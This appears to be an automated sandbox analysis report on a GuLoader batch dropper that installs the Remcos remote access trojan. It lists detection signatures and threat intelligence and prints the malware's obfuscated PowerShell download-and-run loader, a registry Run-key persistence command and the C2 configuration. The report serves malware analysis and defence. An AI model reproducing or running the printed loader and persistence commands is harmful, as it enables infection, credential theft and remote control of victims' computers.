Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
LTEXSP 5634 HISP9005 ST MSDS DOKUME74247liniereletbrunkagerne.bat

Overview

General Information

Sample name:LTEXSP 5634 HISP9005 ST MSDS DOKUME74247liniereletbrunkagerne.bat
Analysis ID:1539161
MD5:79c452316f1b510462cf29f5fbbd84ba
SHA1:2f95ab9367e8ef18427e2a8568afffbe0f197f22
SHA256:4c697bdcbe64036ba8a79e587462960e856a37e3b8c94f9b3e7875aeb2f91959
Tags:batuser-lowmal3
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Early bird code injection technique detected
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Maps a DLL or memory area into another process
Powershell creates an autostart link
Queues an APC in another process (thread injection)
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sleep loop found (likely to delay execution)
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 5772 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\LTEXSP 5634 HISP9005 ST MSDS DOKUME74247liniereletbrunkagerne.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 4052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2912 cmdline: powershell.exe -windowstyle hidden " <#Afstrmningsforholdene Mastigoneme Cuspidine informers Verdensbermthedernes Vandforsyningsresursers Vidneudsagnet #>;$Databger162='Usigelig';<#Receptorernes Preparietal Kavalerers Vernix Eskortere Betalbare #>;$Afgiftssatser=$Machine+$host.UI; function Fyrsternes($Sadlepladser){If ($Afgiftssatser) {$Horological++;}$Krydsfinerplade=$Angstneuroser+$Sadlepladser.'Length'-$Horological; for( $Swatting=4;$Swatting -lt $Krydsfinerplade;$Swatting+=5){$gratulerende=$Swatting;$Renees+=$Sadlepladser[$Swatting];$Fremtidsforskerens='Butenes';}$Renees;}function kaldedes($Teksthistories){ . ($Absolutismes) ($Teksthistories);}$Lively=Fyrsternes ',kelME,eroBaitzMagiiHi hlAcrol Sanadsri/Mose ';$Lively+=Fyrsternes 'Jasp5Feve.Unpa0Ga t Sab.(MoviWM sti,ovinN ordEs uoSk dwTebrs .li HjerNMe.aTbobb Smrb1Ou t0Marg.Skov0Ride;Pac S bvW osihowbnScyb6Test4 F i;Sata Po xHaug6Pl m4 lon;Knit F ndrB ttvStr :ga,p1Ti e3None1 put.S ap0 Led)Out SymbGSvroe Rosc knok Ar oAlab/Vars2 rem0 Da.1guld0I.do0tugt1Fljl0Domm1Jean HydF Regi Ch rHalielsehfGrouoEspaxBli /Tok 1 Urf3Hyra1 Tal.mind0Rapf ';$Hairstylists=Fyrsternes 'AlmuUKrivsFor eAm eRSimu-Kramadel gBor E Amin SubT loc ';$Hypernic=Fyrsternes 'Sy ehLimptVapot AnnpKarbsTand:Supe/Co p/PopupFrmnlSepti T.reBeculUnrit Sard Pro.FejltDataoEkspp Ple/Hov KVoyavGur aNormlGriliJudifistaiDetecWhipeSta rStudeOverdCorreTricsOuvr.Bankq CycxPiondIoej ';$Torsiogram=Fyrsternes 'Soci>Moto ';$Absolutismes=Fyrsternes 'U maifinaE LecxNavn ';$foredragsforeninger='Timetable';$Overwhelmingly='\Unslave.Mel';kaldedes (Fyrsternes 'Todk$ Torg SkrlNon o onbSalgADistluds :EpisFTriveUnivr Teki ,paa SprsObst5 S r= .ro$IsomeA abnCateV Pse:af saUrstPDuckpFedeDAntiAMultTKablA har+fari$GeodoMaimv SkyE HysrKnejwElsdhB ndE,occL oleMvkkeiTabsn PokG BorLInteY r,i ');kaldedes (Fyrsternes 'I in$K,ntg OphlP ojoPertBKar aAmatlStol:caviuacrodSlipgVarsI atifslskt Spas KoobR.eueBotthDaasO recvResmeKystTLincsBetr=Vas $OmstHA.urYRu.dPBridESpa.rCitaNBr eI.iliC .sn.ColoSDeviPSlicl UnmiLasttIn e(ager$Lgeet katOReinR PedSRangi Bi OLegeGHe orBiogaAr,em Gro)Boxb ');kaldedes (Fyrsternes 'Opdy[ UnsNLys eAdipTFoge.FalssN,naeSciaREtervGradi AfdCGeepE otopDis.o domIbarynSupeTH poMr craBoerNPiemaBe ngU.dteUpasrMani]Part:T.ul: DemS WalEPterCUdlnu sanRF skIFr sTNediYOmsaP O erDauwOKofiTOutnOFrydcPrveOForkLNost Vio,= utc Poll[Cavan,udeEP,natb ch.RecesTab eBr sCUndiuOmveRCentiK pit TreY .ntPSuper PraO BriT.karOEntrC rbvORestl IneTfolkYMusspHrmoE Hep]Redi:Conn:idmtTKlaslguarStec 1.umo2 Cra ');$Hypernic=$Udgiftsbehovets[0];$Decalcify18=(Fyrsternes '.hit$sak GBodslreemOdes bFremAUnprL abo:SideIStelmSaecM AnaOArborUnenTLejeaUnrelslowI KnaSbackEv luDRota=Bl,aNPostesoapWLbed-UnmaoTen.bB eojKildeUnscCT stTIc c Hy rsHomoYA.beS .agt onaEUn emB.nd.ForunTripeHandT nse.MalewCuerESchfb ImpcBegel po iUnace PinnZooft.kat ');kaldedes ($Decalcify18);kaldedes (Fyrsternes 'Frem$.verIA stm In.mPa moSpunrPreitTel aHopllMotoiRetosSenseStard emo.ForeHCo,ae OpgaCha dSelseAflarTomjsSu.b[ Bip$ PreH madaDecriF odrReevsIzbatWalky Fonl FoliIndesEne tJac.sKorr]Akan=Dest$Ju eLFo eiR fov de eUnp lnyt y .kr ');$Netvrkslsningens=Fyrsternes ' Nor$SadhI PinmKa,smUssioStr,rPhaltPrinaSymmlBialicratsFi.eeAdrodTole. Ro.Dnsk,o DecwprotnGuailSengoT,kka u,bd BolFM noiR velBir e Me (Egyp$ Af.HexpeyTorepUdgae U,sridion ecoiPe ncScen,Ne.r$,ranBDolkaMaplrAutetGri.hWouloPhenl,mbloo rnmUncoeFllea w snnaal)tam. ';$Bartholomean=$Ferias5;kaldedes (Fyrsternes 'Hier$ Ti gAll L tikOConvBTingaSkyplUnde: MisFTevaABomuNBehaFUnc aChokR WraoAce,n Bo AFlygd B.seR,mp1Gaml2 ,en8u io= Fun( Reot Fr,EAaresUn eT Re -SporPBrugaBun t Or,H.hum Fabr$SamfBPrseaPlisrVatit .mbHsupeo monL allOtredmSlaue Dela KarnKkke)Refi ');while (!$Fanfaronade128) {kaldedes (Fyrsternes 'Omga$ HungTsarl DenoRevebComiaReenlKrig:PalaOTenddSn oiUncosTurke TensDisktSy d=Mang$PendtFl trUnthu laneUdra ') ;kaldedes $Netvrkslsningens;kaldedes (Fyrsternes 'StegS Utnt claaQuadRQuadTOver-SabbSEverl Scaeres,EendeP Emm Vin4tige ');kaldedes (Fyrsternes 'Rygz$,rbegDo,elE poo Civb Sp a FinlBran:Hir.fnaivA Tu,n resFMethak adrCharOTudeNGisnAAcridDullEFire1 .kk2 Son8Apol= er(K.ngtBolveSproSKlipTC ck-.aanP LinAbraitGrusHaphy Tvan$f siB KonaH,tcRInteTExpuHLsenOTa.olVandoG.unM NagEDe cA PreNPerg)Cast ') ;kaldedes (Fyrsternes 'Stel$Su.egDebaL ChioD,ssBLionADiselRoya:Phy i TelNTeetDpunkeEft,NModtr ReaiS,ufGBriksGardF Reml SteY MalV ,inNNonciM llNDruiGTo aeRangRtabuN RedeV,de=Ha m$ En gInsplSenaOKanebEnj,ANonpl gro:EcottNaturOph.uNon ISmurnDyrpgA lv+I am+Pref%A,ch$.eskUAposD .roGBrneiP,ocfAdelTMesosDivibMet E UndhsystOReedv erEFortTAf.is Ups.D ggCTu eOBilbu MicN KryTT ta ') ;$Hypernic=$Udgiftsbehovets[$Indenrigsflyvningerne];}$Begravelsesaftale=340812;$Kuverts=30123;kaldedes (Fyrsternes 'Arbe$ SoeGS.bflStjiONonsB Su aUdstlGui : Bu.SIndvoCervLBilldGaloE dprHea i StaSQui TCholE HalNkachSanst J te=Acti ElogSpeceaarbtFort- E tCAfvaOAgniNPoohTCouneHumiNFlastWi,d Lovr$FlskbShipA O grBriltBelgHRenoOAc dlKultoHundM SkaeramiAVul nK.lo ');kaldedes (Fyrsternes 'Fred$w ndg Re,lVirgoBonbbUnbuaUnmulPr k:Or fSFagba ,admfranmPl ueRivenBa,ifRe.eaflakl Un.dfi neBattnFamieO kesAppe Afm= Tru Tilk[ GtsSG upyLysesChantCutleCircm P.d.Piz CKonooSnornLigkvCo se,iblrTeknt,eba]Meka: ydr: s lFKederDagko Senm O oBCr eaSubfs reveIn i6Revu4I feS FratCounrRavniFlaxnUnsmgLuxu(Bibe$LancSIncoo.virlOverdCause Decr Be iFlaksVltetTaabetilenMaltsChol)Fjer ');kaldedes (Fyrsternes 'St,r$GbakGCholLTotaoKu sbTazeADesaL han: W nOBahiVfodsEUnf R a.tfKl nlHyalOStemRMenti ,nodSe o Re,r= Slr Fode[ codSMi,rY TansVrelTSvr EByplm re.LnkltR,adE npxEvertHemo.E,eweF rmnSnuec BerO oredNonvITerrn BroG Fri]C,nd:ange:GgeuADuplsVidecIndsI UnsII di. desgSub eBe zTBollSSrgeti.lur ndeiModgnBlacGDeta( Mon$ph.nSAp,paRepomRe em RapEAntinKommFR ylaNortlUneldMeadeHar,nIndee .usS Va )Term ');kaldedes (Fyrsternes 'Ja.t$Stamg Te lPearo,uidbNo.eAMod LDomm:Gr,rAFo tLbesslSlvsEDe,elHaziUR.glJ Nada Dia7C,st8 For=Weig$AlkiO OveV R ve MaiR O,tfViddLApotOInterBi bIKangdIde .Erh sRensU ennbFej srefotFirkRBliaI.anonNoncgBugt( Ant$OutdBStatEAareGTilbR Misa An.VSkile roLAnalS.vrdeC,sssUndeaRnkefBe.oTAegfa.hamLLubbeVide,triv$BlaakIlliUSta,V ksePrenr Selt,krms Pri)Blue ');kaldedes $Alleluja78;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 6776 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Afstrmningsforholdene Mastigoneme Cuspidine informers Verdensbermthedernes Vandforsyningsresursers Vidneudsagnet #>;$Databger162='Usigelig';<#Receptorernes Preparietal Kavalerers Vernix Eskortere Betalbare #>;$Afgiftssatser=$Machine+$host.UI; function Fyrsternes($Sadlepladser){If ($Afgiftssatser) {$Horological++;}$Krydsfinerplade=$Angstneuroser+$Sadlepladser.'Length'-$Horological; for( $Swatting=4;$Swatting -lt $Krydsfinerplade;$Swatting+=5){$gratulerende=$Swatting;$Renees+=$Sadlepladser[$Swatting];$Fremtidsforskerens='Butenes';}$Renees;}function kaldedes($Teksthistories){ . ($Absolutismes) ($Teksthistories);}$Lively=Fyrsternes ',kelME,eroBaitzMagiiHi hlAcrol Sanadsri/Mose ';$Lively+=Fyrsternes 'Jasp5Feve.Unpa0Ga t Sab.(MoviWM sti,ovinN ordEs uoSk dwTebrs .li HjerNMe.aTbobb Smrb1Ou t0Marg.Skov0Ride;Pac S bvW osihowbnScyb6Test4 F i;Sata Po xHaug6Pl m4 lon;Knit F ndrB ttvStr :ga,p1Ti e3None1 put.S ap0 Led)Out SymbGSvroe Rosc knok Ar oAlab/Vars2 rem0 Da.1guld0I.do0tugt1Fljl0Domm1Jean HydF Regi Ch rHalielsehfGrouoEspaxBli /Tok 1 Urf3Hyra1 Tal.mind0Rapf ';$Hairstylists=Fyrsternes 'AlmuUKrivsFor eAm eRSimu-Kramadel gBor E Amin SubT loc ';$Hypernic=Fyrsternes 'Sy ehLimptVapot AnnpKarbsTand:Supe/Co p/PopupFrmnlSepti T.reBeculUnrit Sard Pro.FejltDataoEkspp Ple/Hov KVoyavGur aNormlGriliJudifistaiDetecWhipeSta rStudeOverdCorreTricsOuvr.Bankq CycxPiondIoej ';$Torsiogram=Fyrsternes 'Soci>Moto ';$Absolutismes=Fyrsternes 'U maifinaE LecxNavn ';$foredragsforeninger='Timetable';$Overwhelmingly='\Unslave.Mel';kaldedes (Fyrsternes 'Todk$ Torg SkrlNon o onbSalgADistluds :EpisFTriveUnivr Teki ,paa SprsObst5 S r= .ro$IsomeA abnCateV Pse:af saUrstPDuckpFedeDAntiAMultTKablA har+fari$GeodoMaimv SkyE HysrKnejwElsdhB ndE,occL oleMvkkeiTabsn PokG BorLInteY r,i ');kaldedes (Fyrsternes 'I in$K,ntg OphlP ojoPertBKar aAmatlStol:caviuacrodSlipgVarsI atifslskt Spas KoobR.eueBotthDaasO recvResmeKystTLincsBetr=Vas $OmstHA.urYRu.dPBridESpa.rCitaNBr eI.iliC .sn.ColoSDeviPSlicl UnmiLasttIn e(ager$Lgeet katOReinR PedSRangi Bi OLegeGHe orBiogaAr,em Gro)Boxb ');kaldedes (Fyrsternes 'Opdy[ UnsNLys eAdipTFoge.FalssN,naeSciaREtervGradi AfdCGeepE otopDis.o domIbarynSupeTH poMr craBoerNPiemaBe ngU.dteUpasrMani]Part:T.ul: DemS WalEPterCUdlnu sanRF skIFr sTNediYOmsaP O erDauwOKofiTOutnOFrydcPrveOForkLNost Vio,= utc Poll[Cavan,udeEP,natb ch.RecesTab eBr sCUndiuOmveRCentiK pit TreY .ntPSuper PraO BriT.karOEntrC rbvORestl IneTfolkYMusspHrmoE Hep]Redi:Conn:idmtTKlaslguarStec 1.umo2 Cra ');$Hypernic=$Udgiftsbehovets[0];$Decalcify18=(Fyrsternes '.hit$sak GBodslreemOdes bFremAUnprL abo:SideIStelmSaecM AnaOArborUnenTLejeaUnrelslowI KnaSbackEv luDRota=Bl,aNPostesoapWLbed-UnmaoTen.bB eojKildeUnscCT stTIc c Hy rsHomoYA.beS .agt onaEUn emB.nd.ForunTripeHandT nse.MalewCuerESchfb ImpcBegel po iUnace PinnZooft.kat ');kaldedes ($Decalcify18);kaldedes (Fyrsternes 'Frem$.verIA stm In.mPa moSpunrPreitTel aHopllMotoiRetosSenseStard emo.ForeHCo,ae OpgaCha dSelseAflarTomjsSu.b[ Bip$ PreH madaDecriF odrReevsIzbatWalky Fonl FoliIndesEne tJac.sKorr]Akan=Dest$Ju eLFo eiR fov de eUnp lnyt y .kr ');$Netvrkslsningens=Fyrsternes ' Nor$SadhI PinmKa,smUssioStr,rPhaltPrinaSymmlBialicratsFi.eeAdrodTole. Ro.Dnsk,o DecwprotnGuailSengoT,kka u,bd BolFM noiR velBir e Me (Egyp$ Af.HexpeyTorepUdgae U,sridion ecoiPe ncScen,Ne.r$,ranBDolkaMaplrAutetGri.hWouloPhenl,mbloo rnmUncoeFllea w snnaal)tam. ';$Bartholomean=$Ferias5;kaldedes (Fyrsternes 'Hier$ Ti gAll L tikOConvBTingaSkyplUnde: MisFTevaABomuNBehaFUnc aChokR WraoAce,n Bo AFlygd B.seR,mp1Gaml2 ,en8u io= Fun( Reot Fr,EAaresUn eT Re -SporPBrugaBun t Or,H.hum Fabr$SamfBPrseaPlisrVatit .mbHsupeo monL allOtredmSlaue Dela KarnKkke)Refi ');while (!$Fanfaronade128) {kaldedes (Fyrsternes 'Omga$ HungTsarl DenoRevebComiaReenlKrig:PalaOTenddSn oiUncosTurke TensDisktSy d=Mang$PendtFl trUnthu laneUdra ') ;kaldedes $Netvrkslsningens;kaldedes (Fyrsternes 'StegS Utnt claaQuadRQuadTOver-SabbSEverl Scaeres,EendeP Emm Vin4tige ');kaldedes (Fyrsternes 'Rygz$,rbegDo,elE poo Civb Sp a FinlBran:Hir.fnaivA Tu,n resFMethak adrCharOTudeNGisnAAcridDullEFire1 .kk2 Son8Apol= er(K.ngtBolveSproSKlipTC ck-.aanP LinAbraitGrusHaphy Tvan$f siB KonaH,tcRInteTExpuHLsenOTa.olVandoG.unM NagEDe cA PreNPerg)Cast ') ;kaldedes (Fyrsternes 'Stel$Su.egDebaL ChioD,ssBLionADiselRoya:Phy i TelNTeetDpunkeEft,NModtr ReaiS,ufGBriksGardF Reml SteY MalV ,inNNonciM llNDruiGTo aeRangRtabuN RedeV,de=Ha m$ En gInsplSenaOKanebEnj,ANonpl gro:EcottNaturOph.uNon ISmurnDyrpgA lv+I am+Pref%A,ch$.eskUAposD .roGBrneiP,ocfAdelTMesosDivibMet E UndhsystOReedv erEFortTAf.is Ups.D ggCTu eOBilbu MicN KryTT ta ') ;$Hypernic=$Udgiftsbehovets[$Indenrigsflyvningerne];}$Begravelsesaftale=340812;$Kuverts=30123;kaldedes (Fyrsternes 'Arbe$ SoeGS.bflStjiONonsB Su aUdstlGui : Bu.SIndvoCervLBilldGaloE dprHea i StaSQui TCholE HalNkachSanst J te=Acti ElogSpeceaarbtFort- E tCAfvaOAgniNPoohTCouneHumiNFlastWi,d Lovr$FlskbShipA O grBriltBelgHRenoOAc dlKultoHundM SkaeramiAVul nK.lo ');kaldedes (Fyrsternes 'Fred$w ndg Re,lVirgoBonbbUnbuaUnmulPr k:Or fSFagba ,admfranmPl ueRivenBa,ifRe.eaflakl Un.dfi neBattnFamieO kesAppe Afm= Tru Tilk[ GtsSG upyLysesChantCutleCircm P.d.Piz CKonooSnornLigkvCo se,iblrTeknt,eba]Meka: ydr: s lFKederDagko Senm O oBCr eaSubfs reveIn i6Revu4I feS FratCounrRavniFlaxnUnsmgLuxu(Bibe$LancSIncoo.virlOverdCause Decr Be iFlaksVltetTaabetilenMaltsChol)Fjer ');kaldedes (Fyrsternes 'St,r$GbakGCholLTotaoKu sbTazeADesaL han: W nOBahiVfodsEUnf R a.tfKl nlHyalOStemRMenti ,nodSe o Re,r= Slr Fode[ codSMi,rY TansVrelTSvr EByplm re.LnkltR,adE npxEvertHemo.E,eweF rmnSnuec BerO oredNonvITerrn BroG Fri]C,nd:ange:GgeuADuplsVidecIndsI UnsII di. desgSub eBe zTBollSSrgeti.lur ndeiModgnBlacGDeta( Mon$ph.nSAp,paRepomRe em RapEAntinKommFR ylaNortlUneldMeadeHar,nIndee .usS Va )Term ');kaldedes (Fyrsternes 'Ja.t$Stamg Te lPearo,uidbNo.eAMod LDomm:Gr,rAFo tLbesslSlvsEDe,elHaziUR.glJ Nada Dia7C,st8 For=Weig$AlkiO OveV R ve MaiR O,tfViddLApotOInterBi bIKangdIde .Erh sRensU ennbFej srefotFirkRBliaI.anonNoncgBugt( Ant$OutdBStatEAareGTilbR Misa An.VSkile roLAnalS.vrdeC,sssUndeaRnkefBe.oTAegfa.hamLLubbeVide,triv$BlaakIlliUSta,V ksePrenr Selt,krms Pri)Blue ');kaldedes $Alleluja78;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 3420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 2996 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • cmd.exe (PID: 6964 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Forsnakket154" /t REG_EXPAND_SZ /d "%Dyrespor% -windowstyle 1 $Okkupationstropperne=(gp -Path 'HKCU:\Software\Driftsikkerheds\').Dokkedal;%Dyrespor% ($Okkupationstropperne)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 4044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 2912 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Forsnakket154" /t REG_EXPAND_SZ /d "%Dyrespor% -windowstyle 1 $Okkupationstropperne=(gp -Path 'HKCU:\Software\Driftsikkerheds\').Dokkedal;%Dyrespor% ($Okkupationstropperne)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • msiexec.exe (PID: 5932 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\husdhpbhpulhbvjgwsomcgo" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 5884 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\spywiilbdcdmdbgkndbgftixng" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 1936 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cjlgjswdrkvznhuoxonhqxvgvmwksx" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 3476 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cjlgjswdrkvznhuoxonhqxvgvmwksx" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["pikolee.duckdns.org:51525:1"], "Assigned name": "power", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-MC4T64", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.2419273887.0000000008590000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
    00000009.00000002.4585582185.0000000005F41000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000009.00000003.2601743861.0000000005F68000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000009.00000002.4585582185.0000000005F55000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000009.00000003.2540279422.0000000005F66000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
            Click to see the 13 entries

            Other

            SourceRuleDescriptionAuthorStrings
            amsi64_2912.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
              amsi32_6776.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0xc492:$b2: ::FromBase64String(
              • 0xb502:$s1: -join
              • 0x4cae:$s4: +=
              • 0x4d70:$s4: +=
              • 0x8f97:$s4: +=
              • 0xb0b4:$s4: +=
              • 0xb39e:$s4: +=
              • 0xb4e4:$s4: +=
              • 0x1541f:$s4: +=
              • 0x1549f:$s4: +=
              • 0x15565:$s4: +=
              • 0x155e5:$s4: +=
              • 0x157bb:$s4: +=
              • 0x1583f:$s4: +=
              • 0xbd30:$e4: Get-WmiObject
              • 0xbf1f:$e4: Get-Process
              • 0xbf77:$e4: Start-Process
              • 0x160c3:$e4: Get-Process

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: CurrentVersion Autorun Keys Modification
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: %Dyrespor% -windowstyle 1 $Okkupationstropperne=(gp -Path 'HKCU:\Software\Driftsikkerheds\').Dokkedal;%Dyrespor% ($Okkupationstropperne), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 2912, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Forsnakket154
              Sigma detected: Direct Autorun Keys Modification
              Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Forsnakket154" /t REG_EXPAND_SZ /d "%Dyrespor% -windowstyle 1 $Okkupationstropperne=(gp -Path 'HKCU:\Software\Driftsikkerheds\').Dokkedal;%Dyrespor% ($Okkupationstropperne)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Forsnakket154" /t REG_EXPAND_SZ /d "%Dyrespor% -windowstyle 1 $Okkupationstropperne=(gp -Path 'HKCU:\Software\Driftsikkerheds\').Dokkedal;%Dyrespor% ($Okkupationstropperne)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Forsnakket154" /t REG_EXPAND_SZ /d "%Dyrespor% -windowstyle 1 $Okkupationstropperne=(gp -Path 'HKCU:\Software\Driftsikkerheds\').Dokkedal;%Dyrespor% ($Okkupationstropperne)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6964, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Forsnakket154" /t REG_EXPAND_SZ /d "%Dyrespor% -windowstyle 1 $Okkupationstropperne=(gp -Path 'HKCU:\Software\Driftsikkerheds\').Dokkedal;%Dyrespor% ($Okkupationstropperne)", ProcessId: 2912, ProcessName: reg.exe
              Sigma detected: Msiexec Initiated Connection
              Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 104.21.56.189, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 2996, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49846
              Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
